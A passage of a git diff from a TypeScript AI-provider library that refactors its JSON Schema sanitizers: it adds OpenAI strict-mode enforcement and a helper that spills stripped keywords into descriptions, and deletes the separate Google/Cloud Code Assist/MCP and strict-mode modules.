`type` keyword that fully describes the constraint + * expressed by this node's `enum` (or `const`), or `undefined` when the + * constraint cannot be reduced to a single primitive type. + * + * Strict mode requires every schema node to declare a concrete `type`. When + * the author wrote `{enum:[...]}` or `{const:X}` without a `type`, we can + * infer one — but only when every value reduces to the same primitive type. + * Mixed-primitive enums (`[1, "two", null]`), enums containing non-primitives + * (`[{a:1}]`), and non-primitive consts (`{a:1}`, `[1,2,3]`) all return + * undefined: those shapes cannot be described by a single `type` keyword, so + * strict mode cannot represent them and the caller must fall back. + */ +function inferStrictPrimitiveTypeFromEnumOrConst(node: Record<string, unknown>): StrictPrimitiveType | undefined { + const values: unknown[] = Array.isArray(node.enum) ? node.enum : Object.hasOwn(node, "const") ? [node.const] : []; + if (values.length === 0) return undefined; + let inferred: StrictPrimitiveType | undefined; + for (const value of values) { + const t = primitiveJsonTypeOf(value); + if (t === undefined) return undefined; // non-primitive (object/array) — strict can't represent + if (inferred === undefined) inferred = t; + else if (inferred !== t) return undefined; // mixed primitives + } + return inferred; +} + +/** + * Per-schema-object memoization slot. The result of `tryEnforceStrictSchema` + * is stamped directly onto the input via `stamp(target, kStrictSchema, …)` + * so repeated calls (different providers, retries, batching) reuse the same + * computed pair without re-walking the tree. + */ +const kStrictSchema = Symbol("pi.schema.strict"); + +/** + * Detect schemas that strict mode *cannot* represent. + * + * Strict mode requires closed object shapes — every property is declared in + * `properties` and listed in `required`. That is incompatible with: + * - `patternProperties` (open keyset matched by regex), + * - `additionalProperties: true` or `additionalProperties: <schema>` (open + * keyset with optional further constraint). + * + * This check recurses into every place a child schema may live (properties, + * items/prefixItems, combinator branches, $defs) so a single offender deep + * in the tree disqualifies the whole schema. Used to fail-open early in + * `tryEnforceStrictSchema` rather than throwing during enforcement. + */ +function hasUnrepresentableStrictObjectMap(schema: Record<string, unknown>, epoch: number = epochNext()): boolean { + if (!once(schema, epoch)) return false; + + let hasPatternProperties = false; + if (isJsonObject(schema.patternProperties)) { + for (const _ in schema.patternProperties) { + hasPatternProperties = true; + break; + } + } + const additionalPropertiesValue = schema.additionalProperties; + const hasSchemaAdditionalProperties = additionalPropertiesValue === true || isJsonObject(additionalPropertiesValue); + if (hasPatternProperties || hasSchemaAdditionalProperties) { + return true; + } + + if (isJsonObject(schema.properties)) { + const properties = schema.properties; + for (const k in properties) { + const propertySchema = properties[k]; + if (isJsonObject(propertySchema) && hasUnrepresentableStrictObjectMap(propertySchema, epoch)) { + return true; + } + } + } + + if (isJsonObject(schema.items)) { + if (hasUnrepresentableStrictObjectMap(schema.items, epoch)) { + return true; + } + } else if (Array.isArray(schema.items)) { + for (const itemSchema of schema.items) { + if (isJsonObject(itemSchema) && hasUnrepresentableStrictObjectMap(itemSchema, epoch)) { + return true; + } + } + } + if (Array.isArray(schema.prefixItems)) { + for (const itemSchema of schema.prefixItems) { + if (isJsonObject(itemSchema) && hasUnrepresentableStrictObjectMap(itemSchema, epoch)) { + return true; + } + } + } + + for (const key of COMBINATOR_KEYS) { + const variants = schema[key]; + if (!Array.isArray(variants)) continue; + for (const variant of variants) { + if (isJsonObject(variant) && hasUnrepresentableStrictObjectMap(variant, epoch)) { + return true; + } + } + } + + for (const defsKey of ["$defs", "definitions"] as const) { + const defs = schema[defsKey]; + if (!isJsonObject(defs)) continue; + for (const k in defs) { + const defSchema = defs[k]; + if (isJsonObject(defSchema) && hasUnrepresentableStrictObjectMap(defSchema, epoch)) { + return true; + } + } + } + + return false; +} + +/** + * First pass of strict-mode preparation. + * + * Rewrites everything strict mode forbids into something it accepts: + * - Drops non-structural keywords (`format`, `pattern`, `examples`, …), + * `const`, `nullable`, and `additionalProperties` (re-added by + * `enforceStrictSchema` as `false`). + * - `type: [a, b]` → `anyOf: [{type: a, …}, {type: b, …}]`, copying only the + * keywords each variant can use (e.g. `properties` stays only on the + * object variant). + * - `const` → single-entry `enum`. + * - Description carries a `(default: X)` suffix so the model still sees the + * documented default after the keyword is stripped. + * - `nullable: true` wraps the whole node in `anyOf:[T,{type:"null"}]`. + * + * Recurses into properties, items, prefixItems, combinators, and $defs. The + * `cache` WeakMap dedupes shared subgraphs; the `epoch` is the cycle guard. + */ +export function sanitizeSchemaForStrictMode( + schema: Record<string, unknown>, + epoch: number = epochNext(), + cache: WeakMap<Record<string, unknown>, Record<string, unknown>> = new WeakMap(), + root: Record<string, unknown> = schema, +): Record<string, unknown> { + const cached = cache.get(schema); + if (cached) return cached; + if (!once(schema, epoch)) return {}; + + // Pre-pass: unravel `$ref` with sibling keys by inlining the resolved def. + // OpenAI strict mode forbids `{$ref, description, ...}`; the SDK resolves + // and merges, with sibling keys taking precedence over the ref'd def. + // Cite: openai-python/src/openai/lib/_pydantic.py:96-110 (`_ensure_strict_json_schema`) + if (typeof schema.$ref === "string") { + let hasSibling = false; + for (const k in schema) { + if (k !== "$ref" && Object.hasOwn(schema, k)) { + hasSibling = true; + break; + } + } + if (hasSibling) { + const resolved = resolveStrictRef(root, schema.$ref); + if (resolved !== undefined) { + // Sibling keys on the schema override keys from the resolved def. + const merged: Record<string, unknown> = { ...resolved }; + for (const k in schema) { + if (k === "$ref" || !Object.hasOwn(schema, k)) continue; + merged[k] = schema[k]; + } + const result = sanitizeSchemaForStrictMode(merged, epoch, cache, root); + cache.set(schema, result); + return result; + } + } + } + + // Pre-pass: collapse single-element `allOf` by inlining its sole entry. + // SDK semantics: `json_schema.update(ensured(all_of[0]))` — the inlined + // entry's keys WIN over original sibling keys, then `allOf` is dropped. + // Cite: openai-python/src/openai/lib/_pydantic.py:79-83 + { + const allOf = schema.allOf; + if (Array.isArray(allOf) && allOf.length === 1 && isJsonObject(allOf[0])) { + const merged: Record<string, unknown> = { ...schema }; + delete merged.allOf; + const sole = allOf[0] as Record<string, unknown>; + for (const k in sole) { + if (Object.hasOwn(sole, k)) merged[k] = sole[k]; + } + const result = sanitizeSchemaForStrictMode(merged, epoch, cache, root); + cache.set(schema, result); + return result; + } + } + + const typeValue = schema.type; + if (Array.isArray(typeValue)) { + const typeVariants = typeValue.filter((entry): entry is string => typeof entry === "string"); + const schemaWithoutType = { ...schema }; + delete schemaWithoutType.type; + + const sanitizedWithoutType = sanitizeSchemaForStrictMode(schemaWithoutType, epoch, cache, root); + if (typeVariants.length === 0) { + cache.set(schema, sanitizedWithoutType); + return sanitizedWithoutType; + } + // Build one variant schema per type. Each variant keeps only the keywords + // relevant to that type — object-only keywords stay on the object variant, + // array-only keywords on the array variant, etc. + // + // `description` is metadata that applies to the whole union, not to any + // single type variant, so hoist it to the wrapper so both branches share + // it without duplication. Matches the optional-property wrap in + // `enforceStrictSchema` and the typical OpenAI strict-mode "description + // on the union" shape. + const { description, ...variantBase } = sanitizedWithoutType; + const variants = typeVariants.map(variantType => { + const variantSchema: Record<string, unknown> = { ...variantBase, type: variantType }; + if (variantType !== "object") { + delete variantSchema.properties; + delete variantSchema.required; + delete variantSchema.additionalProperties; + } + if (variantType !== "array") { + delete variantSchema.items; + } + return sanitizeSchemaForStrictMode(variantSchema, epoch, cache, root); + }); + + if (variants.length === 1) { + const sole = variants[0] as Record<string, unknown>; + if (description !== undefined && !Object.hasOwn(sole, "description")) { + sole.description = description; + } + cache.set(schema, sole); + return sole; + } + + const result: JsonObject = { anyOf: variants }; + if (description !== undefined) result.description = description; + cache.set(schema, result); + return result; + } + // Scalar `type`: walk the keys, rewriting or stripping per strict-mode rules. + + const sanitized: Record<string, unknown> = {}; + cache.set(schema, sanitized); + for (const key in schema) { + const value = schema[key]; + if (key in NON_STRUCTURAL_SCHEMA_KEYS || key === "type" || key === "const" || key === "nullable") { + continue; + } + // `properties` map — recurse into each property schema. + + if (key === "properties" && isJsonObject(value)) { + const properties: Record<string, unknown> = {}; + for (const propertyName in value) { + const propertySchema = value[propertyName]; + properties[propertyName] = isJsonObject(propertySchema) + ? sanitizeSchemaForStrictMode(propertySchema, epoch, cache, root) + : propertySchema; + } + sanitized.properties = properties; + continue; + } + // `items` can be schema, tuple-array, or scalar boolean — recurse where applicable. + + if (key === "items") { + if (isJsonObject(value)) { + sanitized.items = sanitizeSchemaForStrictMode(value, epoch, cache, root); + } else if (Array.isArray(value)) { + sanitized.items = value.map(entry => + isJsonObject(entry) ? sanitizeSchemaForStrictMode(entry, epoch, cache, root) : entry, + ); + } else { + sanitized.items = value; + } + continue; + } + // `prefixItems` is always an array of schemas (draft 2020-12). + + if (key === "prefixItems" && Array.isArray(value)) { + sanitized.prefixItems = value.map(entry => + isJsonObject(entry) ? sanitizeSchemaForStrictMode(entry, epoch, cache, root) : entry, + ); + continue; + } + // `anyOf`/`oneOf`/`allOf` arrays — recurse into each branch. + + if (COMBINATOR_KEYS.includes(key as (typeof COMBINATOR_KEYS)[number]) && Array.isArray(value)) { + sanitized[key] = value.map(entry => + isJsonObject(entry) ? sanitizeSchemaForStrictMode(entry, epoch, cache, root) : entry, + ); + continue; + } + // Definition maps — recurse into each named schema. + + if ((key === "$defs" || key === "definitions") && isJsonObject(value)) { + const defs: Record<string, unknown> = {}; + for (const definitionName in value) { + const definitionSchema = value[definitionName]; + defs[definitionName] = isJsonObject(definitionSchema) + ? sanitizeSchemaForStrictMode(definitionSchema, epoch, cache, root) + : definitionSchema; + } + sanitized[key] = defs; + continue; + } + // `additionalProperties` is owned by `enforceStrictSchema`, which sets it to false. + + if (key === "additionalProperties") { + continue; + } + + if (key === "description" && typeof value === "string" && schema.default !== undefined) { + // Preserve `default:` info for strict-mode providers that strip the keyword. + // Inline as `(default: X)` text in the description, matching the convention for + // runtime-placeholder defaults (e.g. `cwd`) that cannot live in the keyword form. + const defaultVal = schema.default; + const formatted = typeof defaultVal === "string" ? defaultVal : JSON.stringify(defaultVal); + sanitized.description = value.includes("(default:") ? value : `${value} (default: ${formatted})`; + continue; + } + + sanitized[key] = value; + } + // Post-pass: re-derive `type` and turn dropped keywords into a representable shape. + + if (Object.hasOwn(schema, "const")) { + const constVal = schema.const; + const existingEnum = Array.isArray(sanitized.enum) ? sanitized.enum : []; + if (!existingEnum.some(v => areJsonValuesEqual(v, constVal))) { + existingEnum.push(constVal); + } + sanitized.enum = existingEnum; + } + + // Preserve the original scalar type after the strip-and-rebuild loop. + if (typeof typeValue === "string") { + sanitized.type = typeValue; + } + + if (sanitized.type === undefined && isJsonObject(sanitized.properties)) { + sanitized.type = "object"; + } + + if (sanitized.type === undefined && (sanitized.items !== undefined || sanitized.prefixItems !== undefined)) { + sanitized.type = "array"; + } + + // Last-resort inference: a bare `enum`/`const` with homogeneous primitives gets a `type`. + if (sanitized.type === undefined) { + const inferred = inferStrictPrimitiveTypeFromEnumOrConst(sanitized); + if (inferred !== undefined) sanitized.type = inferred; + } + + // `nullable: true` was stripped above — re-introduce it as an `anyOf` wrapper. + // `description` hoists to the wrapper so both branches share it without + // duplication — matches the optional-property wrap in `enforceStrictSchema` + // and the typical OpenAI strict-mode "description on the union" shape. + if (schema.nullable === true) { + const { nullable: _, description, ...withoutNullable } = sanitized; + const wrapper: JsonObject = { anyOf: [withoutNullable, { type: "null" }] }; + if (description !== undefined) wrapper.description = description; + return wrapper; + } + + return sanitized; +} + +/** + * Recursively enforces JSON Schema constraints required by OpenAI/Codex strict mode: + * - `additionalProperties: false` on every object node + * - every key in `properties` present in `required` + * + * Properties absent from the original `required` array were TypeBox-optional. + * They are made nullable (`anyOf: [T, { type: "null" }]`) so the model can + * signal omission by outputting null rather than omitting the key entirely. + * + * @throws {Error} When a schema node has no `type`, array-based combinator + * (`anyOf`/`allOf`/`oneOf`), object-based combinator (`not`), or `$ref` — + * i.e. the node is not representable in strict mode. Prefer + * {@link tryEnforceStrictSchema} which catches this and degrades gracefully. + */ +export function enforceStrictSchema( + schema: Record<string, unknown>, + cache: WeakMap<Record<string, unknown>, Record<string, unknown>> = new WeakMap(), +): Record<string, unknown> { + if (!enter(schema)) { + throw new Error("Schema contains a circular object graph — cannot enforce strict mode"); + } + try { + const cached = cache.get(schema); + if (cached) return cached; + const result = { ...schema }; + cache.set(schema, result); + return enforceStrictSchemaBody(schema, result, cache); + } finally { + exit(schema); + } +} + +function enforceStrictSchemaBody( + _schema: Record<string, unknown>, + result: Record<string, unknown>, + cache: WeakMap<Record<string, unknown>, Record<string, unknown>>, +): Record<string, unknown> { + const isObjectType = result.type === "object"; + if (isObjectType) { + result.additionalProperties = false; + const propertiesValue = result.properties; + const props = + propertiesValue != null && typeof propertiesValue === "object" && !Array.isArray(propertiesValue) + ? (propertiesValue as Record<string, unknown>) + : {}; + const originalRequired = new Set<string>( + Array.isArray(result.required) + ? result.required.filter((value): value is string => typeof value === "string") + : [], + ); + const strictProperties: Record<string, unknown> = {}; + for (const key in props) { + const value = props[key]; + const processed = + value != null && typeof value === "object" && !Array.isArray(value) + ? enforceStrictSchema(value as Record<string, unknown>, cache) + : value; + // Optional property — wrap as nullable so strict mode accepts it + if (!originalRequired.has(key)) { + // Don't double-wrap if already nullable + if ( + isJsonObject(processed) && + Array.isArray(processed.anyOf) && + processed.anyOf.some(v => isJsonObject(v) && v.type === "null") + ) { + strictProperties[key] = processed; + continue; + } + if (isJsonObject(processed) && typeof processed.description === "string") { + const { description, ...withoutDescription } = processed; + strictProperties[key] = { anyOf: [withoutDescription, { type: "null" }], description }; + continue; + } + strictProperties[key] = { anyOf: [processed, { type: "null" }] }; + continue; + } + strictProperties[key] = processed; + } + result.properties = strictProperties; + result.required = Object.keys(strictProperties); + } + if (result.items != null && typeof result.items === "object") { + if (Array.isArray(result.items)) { + result.items = result.items.map(entry => + entry != null && typeof entry === "object" && !Array.isArray(entry) + ? enforceStrictSchema(entry as Record<string, unknown>, cache) + : entry, + ); + } else { + result.items = enforceStrictSchema(result.items as Record<string, unknown>, cache); + } + } + if (Array.isArray(result.prefixItems)) { + result.prefixItems = result.prefixItems.map(entry => + entry != null && typeof entry === "object" && !Array.isArray(entry) + ? enforceStrictSchema(entry as Record<string, unknown>, cache) + : entry, + ); + } + for (const key of COMBINATOR_KEYS) { + if (Array.isArray(result[key])) { + result[key] = (result[key] as unknown[]).map(entry => + entry != null && typeof entry === "object" && !Array.isArray(entry) + ? enforceStrictSchema(entry as Record<string, unknown>, cache) + : entry, + ); + } + } + for (const defsKey of ["$defs", "definitions"] as const) { + if (result[defsKey] != null && typeof result[defsKey] === "object" && !Array.isArray(result[defsKey])) { + const defs = result[defsKey] as Record<string, unknown>; + const nextDefs: Record<string, unknown> = {}; + for (const name in defs) { + const def = defs[name]; + nextDefs[name] = + def != null && typeof def === "object" && !Array.isArray(def) + ? enforceStrictSchema(def as Record<string, unknown>, cache) + : def; + } + result[defsKey] = nextDefs; + } + } + // Strict mode requires every schema node to declare a concrete type (or + // combinator / `$ref` / `not`). When `type` is missing, try to infer it + // from a homogeneous-primitive `enum` / `const` so direct calls to + // `enforceStrictSchema` (which bypass `sanitizeSchemaForStrictMode`'s own + // inference pass) still produce wire-valid output. + if (result.type === undefined) { + const inferred = inferStrictPrimitiveTypeFromEnumOrConst(result); + if (inferred !== undefined) result.type = inferred; + } + // Schemas like `{}`, `{items: {}}`, mixed-primitive enums, and non-primitive + // consts are not representable in strict mode — `enum`/`const` are not + // accepted as type substitutes here because they did not yield a single + // inferable type above. + if ( + result.type === undefined && + result.$ref === undefined && + !COMBINATOR_KEYS.some(key => Array.isArray(result[key])) && + !isJsonObject(result.not) + ) { + throw new Error("Schema node has no type, combinator, or $ref — cannot enforce strict mode"); + } + return result; +} + +export function tryEnforceStrictSchema(schema: Record<string, unknown>): { + schema: Record<string, unknown>; + strict: boolean; +} { + return stamp(schema, kStrictSchema, s => { + const upgraded = upgradeJsonSchemaTo202012(s) as Record<string, unknown>; + if (hasUnrepresentableStrictObjectMap(upgraded)) { + return { schema: upgraded, strict: false }; + } + try { + const sanitized = sanitizeSchemaForStrictMode(upgraded); + return { schema: enforceStrictSchema(sanitized), strict: true }; + } catch { + return { schema: upgraded, strict: false }; + } + }); +} + +/** + * Resolve a JSON-pointer-style `$ref` against the root schema. Mirrors the + * OpenAI SDK's `resolve_ref` helper: only local refs starting with `#/` are + * supported, and each segment must dereference to a dictionary. + * Cite: openai-python/src/openai/lib/_pydantic.py:118-129 + */ +function resolveStrictRef(root: Record<string, unknown>, ref: string): Record<string, unknown> | undefined { + if (!ref.startsWith("#/")) return undefined; + const segments = ref.slice(2).split("/"); + let cursor: unknown = root; + for (const raw of segments) { + if (!isJsonObject(cursor)) return undefined; + // JSON Pointer unescape: ~1 → "/", ~0 → "~" (must run in that order). + const segment = raw.replace(/~1/g, "/").replace(/~0/g, "~"); + cursor = cursor[segment]; + } + return isJsonObject(cursor) ? cursor : undefined; +} diff --git a/packages/ai/src/utils/schema/sanitize-google.ts b/packages/ai/src/utils/schema/sanitize-google.ts deleted file mode 100644 index de52a0b22..000000000 --- a/packages/ai/src/utils/schema/sanitize-google.ts +++ /dev/null @@ -1,255 +0,0 @@ -/** - * Provider-specific JSON Schema sanitizers used in the request path. - * - * Google's Schema proto, Cloud Code Assist's Claude bridge, and MCP/AJV - * validation all reject different subsets of standard JSON Schema. Rather - * than ship three near-identical walkers, this module exposes a shared - * `sanitizeSchemaImpl` parameterised by an options bag, plus three thin - * wrappers that fix the option set for each target. - */ -import { dereferenceJsonSchema } from "./dereference"; -import { upgradeJsonSchemaTo202012 } from "./draft"; -import { areJsonValuesEqual } from "./equality"; -import { UNSUPPORTED_SCHEMA_FIELDS } from "./fields"; -import { epochNext, once } from "./stamps"; - -/** - * Options that pin the behavior of `sanitizeSchemaImpl`. - * - * - `insideProperties`: true when we are walking the children of a `properties` - * object. Keys at that level are property *names*, not JSON-Schema keywords — - * so the "strip unsupported keyword" rule must not apply. - * - `normalizeTypeArrayToNullable`: convert `type: ["string","null"]` to - * `type: "string"` + `nullable: true`. Required for Google's proto; left off - * for MCP which keeps standard JSON Schema shapes. - * - `stripNullableKeyword`: remove `nullable` entirely. CCA forbids the - * keyword; Google keeps it. - * - `unsupportedFields`: provider-specific keyword blacklist. - * - `epoch`: shared cycle guard (see `stamps.ts`). - */ -interface SanitizeSchemaOptions { - insideProperties: boolean; - normalizeTypeArrayToNullable: boolean; - stripNullableKeyword: boolean; - unsupportedFields: Record<string, true>; - epoch: number; -} - -function inferJsonSchemaTypeFromValue(value: unknown): string | undefined { - if (value === null) return "null"; - if (Array.isArray(value)) return "array"; - switch (typeof value) { - case "string": - return "string"; - case "number": - return "number"; - case "boolean": - return "boolean"; - case "object": - return "object"; - default: - return undefined; - } -} - -function pushEnumValue(values: unknown[], value: unknown): void { - if (!values.some(existing => areJsonValuesEqual(existing, value))) { - values.push(value); - } -} - -/** - * Generic sanitizer core. Two phases: - * 1. If a combiner (`anyOf`/`oneOf`) holds variants that are all `const` - * values, collapse it into an `enum`. Google/CCA do not accept - * `const`-in-combinator unions but do accept enums. - * 2. Otherwise, walk the schema, stripping disallowed keywords and - * recursing into children. Standalone `const` values are converted to - * single-entry `enum` arrays. - * Cycle-safe via `once(epoch)`; cycles short-circuit to `{}`/`[]`. - */ -function sanitizeSchemaImpl(value: unknown, options: SanitizeSchemaOptions): unknown { - if (Array.isArray(value)) { - if (!once(value, options.epoch)) return []; - return value.map(entry => sanitizeSchemaImpl(entry, options)); - } - if (!value || typeof value !== "object") { - return value; - } - if (!once(value as object, options.epoch)) return {}; - const obj = value as Record<string, unknown>; - const result: Record<string, unknown> = {}; - for (const combiner of ["anyOf", "oneOf"] as const) { - if (Array.isArray(obj[combiner])) { - const variants = obj[combiner] as Record<string, unknown>[]; - const allHaveConst = variants.every(v => v && typeof v === "object" && "const" in v); - if (allHaveConst && variants.length > 0) { - // Step 1a: collect deduped enum values from every variant's const. - const dedupedEnum: unknown[] = []; - for (const variant of variants) { - pushEnumValue(dedupedEnum, variant.const); - } - result.enum = dedupedEnum; - - const explicitTypes = variants - .map(variant => variant.type) - .filter((variantType): variantType is string => typeof variantType === "string"); - const allHaveSameExplicitType = - explicitTypes.length === variants.length && - explicitTypes.every(variantType => variantType === explicitTypes[0]); - // Step 1b: pick a `type` for the synthesized enum. Prefer an explicit - // type declared on every variant; otherwise infer from the values - // themselves. Mixed types stay un-typed (Google accepts a bare enum). - if (allHaveSameExplicitType && explicitTypes[0]) { - result.type = explicitTypes[0]; - } else { - const inferredTypes = dedupedEnum - .map(enumValue => inferJsonSchemaTypeFromValue(enumValue)) - .filter((inferredType): inferredType is string => inferredType !== undefined); - const inferredTypeSet = new Set(inferredTypes); - if (inferredTypeSet.size === 1) { - result.type = inferredTypes[0]; - } else { - const nonNullInferredTypes = inferredTypes.filter(inferredType => inferredType !== "null"); - const nonNullTypeSet = new Set(nonNullInferredTypes); - // nullable + single non-null type: collapse to scalar + nullable marker. - if (inferredTypes.includes("null") && nonNullTypeSet.size === 1) { - result.type = nonNullInferredTypes[0]; - if (!options.stripNullableKeyword) { - result.nullable = true; - } - } - } - } - - // Step 1c: pull non-combiner siblings (description, etc.) through. - // Copy description and other top-level fields (not the combiner) - for (const key in obj) { - const entry = obj[key]; - if (key !== combiner && !(key in result)) { - result[key] = sanitizeSchemaImpl(entry, { - ...options, - insideProperties: key === "properties", - }); - } - } - return result; - } - } - } - // Phase 2: not a const-combiner — process keys one by one. - let constValue: unknown; - for (const key in obj) { - const entry = obj[key]; - // Only strip unsupported schema keywords when NOT inside "properties" object - // Inside "properties", keys are property names (e.g., "pattern") not schema keywords - if (!options.insideProperties && key in options.unsupportedFields) continue; - if (options.stripNullableKeyword && key === "nullable") continue; - if (key === "const") { - // `const` is converted to a single-entry `enum` after the loop so the - // `type` inference can use it. - constValue = entry; - continue; - } - // When key is "properties", child keys are property names, not schema keywords - result[key] = sanitizeSchemaImpl(entry, { - ...options, - insideProperties: key === "properties", - }); - } - // Normalize array-valued "type" (e.g. ["string", "null"]) to a single type + nullable. - // Google's Schema proto expects type to be a single enum string, not an array. - if (options.normalizeTypeArrayToNullable && Array.isArray(result.type)) { - const types = (result.type as unknown[]).filter((t): t is string => typeof t === "string"); - const nonNull = types.filter(t => t !== "null"); - if (types.includes("null") && !options.stripNullableKeyword) { - result.nullable = true; - } - result.type = nonNull[0] ?? types[0]; - } - if (constValue !== undefined) { - // Convert const to enum, merging with existing enum if present - const existingEnum = Array.isArray(result.enum) ? result.enum : []; - pushEnumValue(existingEnum, constValue); - result.enum = existingEnum; - if (!result.type) { - result.type = inferJsonSchemaTypeFromValue(constValue); - } - } - - // Ensure object schemas have a properties field (some LLM providers require it) - if (result.type === "object" && !("properties" in result)) { - result.properties = {}; - } - - return result; -} - -/** - * Sanitize a JSON Schema for Google's generative AI APIs by stripping unsupported - * JSON Schema keywords and normalizing representable nullable/type patterns. - * - * Draft-07-shaped schemas are upgraded to 2020-12 before provider-specific - * unsupported keywords are stripped. `$ref` is still stripped as unsupported; - * callers that need references preserved must dereference before this path. - */ -export function sanitizeSchemaForGoogle(value: unknown): unknown { - const upgraded = upgradeJsonSchemaTo202012(value); - return sanitizeSchemaImpl(upgraded, { - insideProperties: false, - normalizeTypeArrayToNullable: true, - stripNullableKeyword: false, - unsupportedFields: UNSUPPORTED_SCHEMA_FIELDS, - epoch: epochNext(), - }); -} - -/** - * Sanitize a JSON Schema for Cloud Code Assist Claude. - * Starts from Google sanitizer behavior, then strips `nullable` markers. - * - * Draft-07-shaped schemas are upgraded to 2020-12 before provider-specific - * unsupported keywords are stripped. `$ref` is still stripped as unsupported; - * callers that need references preserved must dereference before this path. - */ -export function sanitizeSchemaForCCA(value: unknown): unknown { - const upgraded = upgradeJsonSchemaTo202012(value); - return sanitizeSchemaImpl(upgraded, { - insideProperties: false, - normalizeTypeArrayToNullable: true, - stripNullableKeyword: true, - unsupportedFields: UNSUPPORTED_SCHEMA_FIELDS, - epoch: epochNext(), - }); -} - -/** - * Fields stripped for MCP/AJV compatibility. - * Only `$schema` — AJV throws on unrecognised meta-schema URIs - * (e.g. draft 2020-12 emitted by schemars 1.x / rmcp 0.15+). - */ -const MCP_UNSUPPORTED_SCHEMA_FIELDS: Record<string, true> = { $schema: true }; - -/** - * Sanitize a JSON Schema for MCP tool parameter validation (AJV compatibility). - * - * Strips only the minimal set of fields that cause AJV validation errors: - * - `$schema`: AJV throws on unknown meta-schema URIs. - * - `nullable`: OpenAPI 3.0 extension, not standard JSON Schema. - * - * Unlike the Google/CCA sanitizers this preserves validation keywords - * (`pattern`, `format`, `additionalProperties`, etc.) and `$ref`/`$defs`. - */ -export function sanitizeSchemaForMCP(value: unknown): unknown { - // Upgrade before dereferencing so legacy `definitions` refs become the - // canonical `$defs` form, then inline refs for providers that drop `$defs`. - const upgraded = upgradeJsonSchemaTo202012(value); - const dereferenced = dereferenceJsonSchema(upgraded); - return sanitizeSchemaImpl(dereferenced, { - insideProperties: false, - normalizeTypeArrayToNullable: false, - stripNullableKeyword: true, - unsupportedFields: MCP_UNSUPPORTED_SCHEMA_FIELDS, - epoch: epochNext(), - }); -} diff --git a/packages/ai/src/utils/schema/spill.ts b/packages/ai/src/utils/schema/spill.ts new file mode 100644 index 000000000..09d4dfe5e --- /dev/null +++ b/packages/ai/src/utils/schema/spill.ts @@ -0,0 +1,43 @@ +import type { JsonObject } from "./types"; + +export type DescriptionSpillFormat = "spill" | "paren"; + +function formatSpillValue(value: unknown): string { + return JSON.stringify(value); +} + +function formatParenValue(value: unknown): string { + return typeof value === "string" ? value : JSON.stringify(value); +} + +/** + * Demote stripped JSON Schema keywords into a node's `description` so the model + * still receives the constraint as natural-language context after the wire + * schema drops it. + */ +export function spillToDescription( + node: JsonObject, + entries: ReadonlyArray<readonly [string, unknown]>, + format: DescriptionSpillFormat = "spill", +): void { + let spilled: Array<readonly [string, unknown]> | undefined; + for (const entry of entries) { + if (entry[1] === undefined) continue; + if (spilled === undefined) spilled = []; + spilled.push(entry); + } + if (spilled === undefined || spilled.length === 0) return; + + const existing = typeof node.description === "string" ? node.description : ""; + if (format === "paren") { + let suffix = ""; + for (const [key, value] of spilled) { + suffix += ` (${key}: ${formatParenValue(value)})`; + } + node.description = `${existing}${suffix}`; + return; + } + + const formatted = `{${spilled.map(([key, value]) => `${key}: ${formatSpillValue(value)}`).join(", ")}}`; + node.description = existing ? `${existing}\n\n${formatted}` : formatted; +} diff --git a/packages/ai/src/utils/schema/strict-mode.ts b/packages/ai/src/utils/schema/strict-mode.ts deleted file mode 100644 index 5da09b8f9..000000000 --- a/packages/ai/src/utils/schema/strict-mode.ts +++ /dev/null @@ -1,490 +0,0 @@ -import { $flag } from "@oh-my-pi/pi-utils"; -import { type ZodType, z } from "zod/v4"; -import { upgradeJsonSchemaTo202012 } from "./draft"; -import { areJsonValuesEqual } from "./equality"; -import { COMBINATOR_KEYS, NON_STRUCTURAL_SCHEMA_KEYS } from "./fields"; -import { enter, epochNext, exit, once, stamp } from "./stamps"; -import { isJsonObject } from "./types"; - -/** - * Creates a string enum schema compatible with Google's API and other providers - * that don't support anyOf/const patterns. - * - * @example - * const OperationSchema = StringEnum(["add", "subtract", "multiply", "divide"], { - * description: "The operation to perform" - * }); - * - * type Operation = z.infer<typeof OperationSchema>; // "add" | "subtract" | ... - */ -export function StringEnum<const T extends readonly string[]>( - values: T, - options?: { description?: string; default?: T[number]; examples?: readonly T[number][] }, -): ZodType<T[number]> { - if (values.length === 0) { - throw new Error("StringEnum requires at least one allowed value"); - } - const tuple = values as unknown as [string, ...string[]]; - let schema: z.ZodTypeAny = z.enum(tuple); - if (options?.description) { - schema = schema.describe(options.description); - } - if (options?.default !== undefined) { - schema = schema.default(options.default); - } - if (options?.examples?.length) { - schema = schema.meta({ examples: [...options.examples] }); - } - return schema as ZodType<T[number]>; -} - -export const NO_STRICT = $flag("PI_NO_STRICT"); -/** - * Per-schema-object memoization slot. The result of `tryEnforceStrictSchema` - * is stamped directly onto the input via `stamp(target, kStrictSchema, …)` - * so repeated calls (different providers, retries, batching) reuse the same - * computed pair without re-walking the tree. - */ -const kStrictSchema = Symbol("pi.schema.strict"); - -/** - * Detect schemas that strict mode *cannot* represent. - * - * Strict mode requires closed object shapes — every property is declared in - * `properties` and listed in `required`. That is incompatible with: - * - `patternProperties` (open keyset matched by regex), - * - `additionalProperties: true` or `additionalProperties: <schema>` (open - * keyset with optional further constraint). - * - * This check recurses into every place a child schema may live (properties, - * items/prefixItems, combinator branches, $defs) so a single offender deep - * in the tree disqualifies the whole schema. Used to fail-open early in - * `tryEnforceStrictSchema` rather than throwing during enforcement. - */ -function hasUnrepresentableStrictObjectMap(schema: Record<string, unknown>, epoch: number = epochNext()): boolean { - if (!once(schema, epoch)) return false; - - let hasPatternProperties = false; - if (isJsonObject(schema.patternProperties)) { - for (const _ in schema.patternProperties) { - hasPatternProperties = true; - break; - } - } - const additionalPropertiesValue = schema.additionalProperties; - const hasSchemaAdditionalProperties = additionalPropertiesValue === true || isJsonObject(additionalPropertiesValue); - if (hasPatternProperties || hasSchemaAdditionalProperties) { - return true; - } - - if (isJsonObject(schema.properties)) { - const properties = schema.properties; - for (const k in properties) { - const propertySchema = properties[k]; - if (isJsonObject(propertySchema) && hasUnrepresentableStrictObjectMap(propertySchema, epoch)) { - return true; - } - } - } - - if (isJsonObject(schema.items)) { - if (hasUnrepresentableStrictObjectMap(schema.items, epoch)) { - return true; - } - } else if (Array.isArray(schema.items)) { - for (const itemSchema of schema.items) { - if (isJsonObject(itemSchema) && hasUnrepresentableStrictObjectMap(itemSchema, epoch)) { - return true; - } - } - } - if (Array.isArray(schema.prefixItems)) { - for (const itemSchema of schema.prefixItems) { - if (isJsonObject(itemSchema) && hasUnrepresentableStrictObjectMap(itemSchema, epoch)) { - return true; - } - } - } - - for (const key of COMBINATOR_KEYS) { - const variants = schema[key]; - if (!Array.isArray(variants)) continue; - for (const variant of variants) { - if 